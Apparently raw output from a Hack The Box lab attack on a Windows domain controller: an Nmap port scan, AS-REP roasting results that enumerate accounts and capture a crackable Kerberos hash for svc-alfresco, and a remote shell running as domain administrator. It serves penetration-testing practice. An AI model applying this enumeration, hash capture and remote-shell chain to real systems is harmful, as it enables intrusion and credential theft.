Nmap scan report for localhost (10.129.155.0)
Host is up (0.22s latency).
Not shown: 65511 closed ports
PORT      STATE SERVICE      VERSION
53/tcp    open  domain       Simple DNS Plus
88/tcp    open  kerberos-sec Microsoft Windows Kerberos (server time: 2022-11-17 09:15:49Z)
135/tcp   open  msrpc        Microsoft Windows RPC
139/tcp   open  netbios-ssn  Microsoft Windows netbios-ssn
389/tcp   open  ldap         Microsoft Windows Active Directory LDAP (Domain: htb.local, Site: Default-First-Site-Name)
445/tcp   open  microsoft-ds Windows Server 2016 Standard 14393 microsoft-ds (workgroup: HTB)
464/tcp   open  kpasswd5?
593/tcp   open  ncacn_http   Microsoft Windows RPC over HTTP 1.0
636/tcp   open  tcpwrapped
3268/tcp  open  ldap         Microsoft Windows Active Directory LDAP (Domain: htb.local, Site: Default-First-Site-Name)
3269/tcp  open  tcpwrapped
5985/tcp  open  http         Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP)
|_http-server-header: Microsoft-HTTPAPI/2.0
|_http-title: Not Found
9389/tcp  open  mc-nmf       .NET Message Framing
47001/tcp open  http         Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP)
|_http-server-header: Microsoft-HTTPAPI/2.0
|_http-title: Not Found
49664/tcp open  msrpc        Microsoft Windows RPC
49665/tcp open  msrpc        Microsoft Windows RPC
49666/tcp open  msrpc        Microsoft Windows RPC
49667/tcp open  msrpc        Microsoft Windows RPC
49671/tcp open  msrpc        Microsoft Windows RPC
49676/tcp open  ncacn_http   Microsoft Windows RPC over HTTP 1.0
49677/tcp open  msrpc        Microsoft Windows RPC
49681/tcp open  msrpc        Microsoft Windows RPC
49699/tcp open  msrpc        Microsoft Windows RPC
63346/tcp open  msrpc        Microsoft Windows RPC
No exact OS matches for host (If you know what OS is running on it, see https://nmap.org/submit/ ).
[-] User Administrator doesn't have UF_DONT_REQUIRE_PREAUTH set
[-] Kerberos SessionError: KDC_ERR_CLIENT_REVOKED(Clients credentials have been revoked)
[-] Kerberos SessionError: KDC_ERR_CLIENT_REVOKED(Clients credentials have been revoked)
[-] Kerberos SessionError: KDC_ERR_CLIENT_REVOKED(Clients credentials have been revoked)
[-] Kerberos SessionError: KDC_ERR_CLIENT_REVOKED(Clients credentials have been revoked)
[-] Kerberos SessionError: KDC_ERR_CLIENT_REVOKED(Clients credentials have been revoked)
[-] Kerberos SessionError: KDC_ERR_CLIENT_REVOKED(Clients credentials have been revoked)
[-] Kerberos SessionError: KDC_ERR_CLIENT_REVOKED(Clients credentials have been revoked)
[-] Kerberos SessionError: KDC_ERR_CLIENT_REVOKED(Clients credentials have been revoked)
[-] Kerberos SessionError: KDC_ERR_CLIENT_REVOKED(Clients credentials have been revoked)
[-] Kerberos SessionError: KDC_ERR_CLIENT_REVOKED(Clients credentials have been revoked)
[-] Kerberos SessionError: KDC_ERR_CLIENT_REVOKED(Clients credentials have been revoked)
[-] Kerberos SessionError: KDC_ERR_CLIENT_REVOKED(Clients credentials have been revoked)
[-] Kerberos SessionError: KDC_ERR_CLIENT_REVOKED(Clients credentials have been revoked)
[-] User HealthMailboxc3d7722 doesn't have UF_DONT_REQUIRE_PREAUTH set
[-] User HealthMailboxfc9daad doesn't have UF_DONT_REQUIRE_PREAUTH set
[-] User HealthMailboxc0a90c9 doesn't have UF_DONT_REQUIRE_PREAUTH set
[-] User HealthMailbox670628e doesn't have UF_DONT_REQUIRE_PREAUTH set
[-] User HealthMailbox968e74d doesn't have UF_DONT_REQUIRE_PREAUTH set
[-] User HealthMailbox6ded678 doesn't have UF_DONT_REQUIRE_PREAUTH set
[-] User HealthMailbox83d6781 doesn't have UF_DONT_REQUIRE_PREAUTH set
[-] User HealthMailboxfd87238 doesn't have UF_DONT_REQUIRE_PREAUTH set
[-] User HealthMailboxb01ac64 doesn't have UF_DONT_REQUIRE_PREAUTH set
[-] User HealthMailbox7108a4e doesn't have UF_DONT_REQUIRE_PREAUTH set
[-] User HealthMailbox0659cc1 doesn't have UF_DONT_REQUIRE_PREAUTH set
[-] User sebastien doesn't have UF_DONT_REQUIRE_PREAUTH set
[-] User lucinda doesn't have UF_DONT_REQUIRE_PREAUTH set
$krb5asrep$23$svc-alfresco@HTB.LOCAL:24f99a62416e8c41339649597df0e5ca$940878b4bf47618dddc63fc6229ec61d73dd91b5262d4b21724b12dd08bcc15c7ee8ce292012a94201a868889d698355e383765d283416246b88f36c7d0f19581776f5e6499486516b6d33119383eb81e31d1148bf2e8647f143d5254bf02a9bfcad83ae524b717bcef99a8e74075e29e241a71e41ddc3d7f37726a568ed621fc73f7729a4354a6dacc724051c53e71c82769ebfb0f84a0393f5945ace650396fbea62a315dd10e2cc06b6157c86ce4651e3cb62eb8440870bd020534d6285c4ae1b6f51b8d846bc97815198e9d00b434c87f8976fc3e1d7c0603e736e0ef239cc302a094515
[-] User andy doesn't have UF_DONT_REQUIRE_PREAUTH set
[-] User mark doesn't have UF_DONT_REQUIRE_PREAUTH set
[-] User santi doesn't have UF_DONT_REQUIRE_PREAUTH set
[*] SMBv3.0 dialect used
[!] Launching semi-interactive shell - Careful what you execute
[!] Press help for extra shell commands
C:\>whoami
htb\administrator